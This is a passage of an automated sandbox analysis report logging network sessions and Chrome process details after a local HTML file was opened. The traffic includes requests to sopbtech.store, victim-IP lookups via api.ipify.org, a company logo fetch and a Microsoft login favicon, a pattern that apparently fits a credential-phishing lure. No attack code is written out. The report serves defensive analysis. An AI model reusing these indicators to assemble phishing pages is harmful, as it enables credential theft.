2024-08-21 21:17:05 UTC	351	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Wed, 28 Aug 2024 21:17:05 GMT content-type: image/png last-modified: Sun, 22 Aug 2021 06:57:06 GMT accept-ranges: bytes content-length: 8165 date: Wed, 21 Aug 2024 21:17:05 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-21 21:17:05 UTC	8165	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b5 00 00 00 ad 08 06 00 00 00 f6 d6 3e 5f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b Data Ascii: PNGIHDR>_pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	3.165.206.76	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:05 UTC	510	OUT	HEAD /buildtosuitinc.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:05 UTC	520	IN	HTTP/1.1 200 OK Content-Type: image/png Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Wed, 21 Aug 2024 21:17:05 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Miss from cloudfront Via: 1.1 77ef56a61f9732eb861f48a4b6d8df92.cloudfront.net (CloudFront) X-Amz-Cf-Pop: VIE50-P3 X-Amz-Cf-Id: k1GX9nSRq059UqifM-TTpYM2qF4OnQqRIBUOmaOZGMd9-nDZNtT6Qg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	172.67.74.152	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:05 UTC	542	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:05 UTC	249	IN	HTTP/1.1 200 OK Date: Wed, 21 Aug 2024 21:17:05 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8b6da5df8b75433d-EWR
2024-08-21 21:17:05 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"ip":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	199.188.200.183	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:06 UTC	362	OUT	GET /start/xls/images/key.png HTTP/1.1 Host: sopbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:06 UTC	351	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Wed, 28 Aug 2024 21:17:06 GMT content-type: image/png last-modified: Sun, 22 Aug 2021 06:57:06 GMT accept-ranges: bytes content-length: 8165 date: Wed, 21 Aug 2024 21:17:06 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-21 21:17:06 UTC	8165	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b5 00 00 00 ad 08 06 00 00 00 f6 d6 3e 5f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b Data Ascii: PNGIHDR>_pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49756	172.67.74.152	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:06 UTC	349	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:06 UTC	217	IN	HTTP/1.1 200 OK Date: Wed, 21 Aug 2024 21:17:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8b6da5e56aa8429d-EWR
2024-08-21 21:17:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"ip":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	3.165.206.76	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:06 UTC	559	OUT	GET /buildtosuitinc.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:07 UTC	548	IN	HTTP/1.1 200 OK Content-Type: image/png Transfer-Encoding: chunked Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Wed, 21 Aug 2024 21:17:07 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Miss from cloudfront Via: 1.1 db1f2c3528f009bf869b6be831e11d7a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: VIE50-P3 X-Amz-Cf-Id: rShrMsbnJqm_8YYUGqw58iVSDjdzCAJh2HYb8k1bD_DSOgtetx-stQ==
2024-08-21 21:17:07 UTC	12886	IN	Data Raw: 33 32 34 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 32 15 49 44 41 54 78 9c ec fd 09 98 5c d7 75 1f 88 9f 73 ee bd ef 55 55 77 a3 bb b1 ef 4b 37 16 02 0d 70 07 09 70 27 45 71 d1 16 c9 16 2d 45 71 f2 8f 63 3b 4e f2 cf cc 24 fa 34 5e 92 49 e2 99 78 46 71 66 a2 8c bf 89 e3 c8 fe c6 89 97 78 ac dd 12 13 49 94 22 92 b2 b8 62 21 08 62 df 1b e8 c6 42 a0 81 46 af 55 ef bd 7b cf 99 ef de f7 aa ba 1a 00 c9 11 5a 40 b7 6d de af be ee ea ea 7a db 3d f7 ec bf 73 ae 16 11 78 7f 4c df a0 e9 be 81 bf ea e3 7d 02 4c f3 78 9f 00 d3 3c de 27 c0 34 8f f7 09 30 cd e3 7d 02 4c f3 78 9f 00 d3 3c de 27 c0 34 8f f7 09 30 cd 43 4f f7 0d bc f3 68 78 e8 d8 f8 db 49 f8 09 c0 08 a6 e9 e6 31 ff b7 d4 bf 87 00 14 7e Data Ascii: 324ePNGIHDRL\2IDATx\usUUwK7pp'Eq-Eqc;N$4^IxFqfxI"b!bBFU{Z@mz=sxL}Lx<'40}Lx<'40COhxI1~
2024-08-21 21:17:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-21 21:17:06 UTC	494	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=69933 Date: Wed, 21 Aug 2024 21:17:06 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49757	13.32.27.14	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:06 UTC	359	OUT	GET /buildtosuitinc.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:07 UTC	547	IN	HTTP/1.1 200 OK Content-Type: image/png Transfer-Encoding: chunked Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Wed, 21 Aug 2024 21:17:07 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Hit from cloudfront Via: 1.1 aff6ac5c98fa897349204752e5877c80.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-C2 X-Amz-Cf-Id: iqKTTd9WJXdasd3qjKTGRjBDS_wIy-f1QK-4dtD_S1oXaw_-kBEOtg==
2024-08-21 21:17:07 UTC	12886	IN	Data Raw: 33 32 34 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 32 15 49 44 41 54 78 9c ec fd 09 98 5c d7 75 1f 88 9f 73 ee bd ef 55 55 77 a3 bb b1 ef 4b 37 16 02 0d 70 07 09 70 27 45 71 d1 16 c9 16 2d 45 71 f2 8f 63 3b 4e f2 cf cc 24 fa 34 5e 92 49 e2 99 78 46 71 66 a2 8c bf 89 e3 c8 fe c6 89 97 78 ac dd 12 13 49 94 22 92 b2 b8 62 21 08 62 df 1b e8 c6 42 a0 81 46 af 55 ef bd 7b cf 99 ef de f7 aa ba 1a 00 c9 11 5a 40 b7 6d de af be ee ea ea 7a db 3d f7 ec bf 73 ae 16 11 78 7f 4c df a0 e9 be 81 bf ea e3 7d 02 4c f3 78 9f 00 d3 3c de 27 c0 34 8f f7 09 30 cd e3 7d 02 4c f3 78 9f 00 d3 3c de 27 c0 34 8f f7 09 30 cd 43 4f f7 0d bc f3 68 78 e8 d8 f8 db 49 f8 09 c0 08 a6 e9 e6 31 ff b7 d4 bf 87 00 14 7e Data Ascii: 324ePNGIHDRL\2IDATx\usUUwK7pp'Eq-Eqc;N$4^IxFqfxI"b!bBFU{Z@mz=sxL}Lx<'40}Lx<'40COhxI1~
2024-08-21 21:17:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49758	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:08 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-21 21:17:08 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=69913 Date: Wed, 21 Aug 2024 21:17:08 GMT Content-Length: 55 Connection: close X-CID: 2
2024-08-21 21:17:08 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	13.107.246.42	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:09 UTC	402	OUT	GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:09 UTC	764	IN	HTTP/1.1 200 OK Date: Wed, 21 Aug 2024 21:17:09 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=604800 Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT ETag: 0x8D6410152A9D7E1 x-ms-request-id: 57a59b26-801e-0049-3cff-f2be10000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240821T211709Z-17fd6bb7c96hvb8j6xhm3vvhb800000008a000000000a1qg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-21 21:17:09 UTC	15620	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-08-21 21:17:09 UTC	1554	IN	Data Raw: 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49764	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:17 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyUNzPbUcAEolyU&MD=4xACS6aV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-21 21:17:18 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 50061629-d405-4f53-bf5c-53f4c7c9a854 MS-RequestId: 9bf917d7-4147-45a1-b771-6f04df794611 MS-CV: ruIAYvvPO0KSOQO5.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 21 Aug 2024 21:17:17 GMT Connection: close Content-Length: 24490
2024-08-21 21:17:18 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-08-21 21:17:18 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49773	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:56 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyUNzPbUcAEolyU&MD=4xACS6aV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-21 21:17:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: f7d543e3-490f-4706-b7c6-df1c36c5764a MS-RequestId: 4f6b3df7-f8f5-414a-b78a-78842d7340a0 MS-CV: dTeX7XlVAEqC5hZ4.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 21 Aug 2024 21:17:56 GMT Connection: close Content-Length: 30005
2024-08-21 21:17:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-08-21 21:17:56 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	17:16:57
Start date:	21/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\022 0.10.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:16:59
Start date:	21/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2008,i,17860956769746736774,1280781556537347280,262144 /prefetch:8
